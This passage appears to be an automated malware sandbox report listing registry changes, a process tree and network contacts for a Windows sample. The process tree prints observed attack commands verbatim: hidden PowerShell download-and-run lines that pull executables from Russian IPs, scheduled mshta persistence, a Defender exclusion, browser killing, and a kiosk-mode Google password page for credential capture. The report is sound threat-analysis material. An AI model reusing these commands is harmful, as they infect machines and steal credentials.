| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
"C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
"C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\system32\taskeng.exe
taskeng.exe {8387FC48-1B8B-4A2E-A46B-DAA0AB7AE7B3} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\ProgramData\sugkcx\gvnsf.exe
C:\ProgramData\sugkcx\gvnsf.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\GH8RmsOFg.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1028
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"
C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1200
C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"
C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.755936859\1884948793" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d284488-94dc-43c2-8703-eef4d499d07a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2068 19ea9358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.668382452\2020364546" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ce6ca1-5ffc-4de3-ba77-71250d0d15d8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2924 e64858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.957323284\231409263" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3812 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba4ef1ef-4c74-45c0-aa97-ba1ccee776fd} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3824 1fccb858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.972541004\640143421" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e0004a2-230c-4dfe-8201-712d705526be} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3940 1fcf4858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1844910257\749227326" -childID 5 -isForBrowser -prefsHandle 4068 -prefMapHandle 3796 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44240c1-0e27-40ac-b4f5-3507ce3bf15a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4056 1fcf2458 tab
C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FEA.tmp\7FEB.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1204
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1016
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 500
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2212_133856897364813000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ipzvs8T3\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.64.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 104.21.24.225:443 | farmingtzricks.top | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| RU | 45.93.20.28:80 | 45.93.20.28 | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| GB | 142.250.187.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
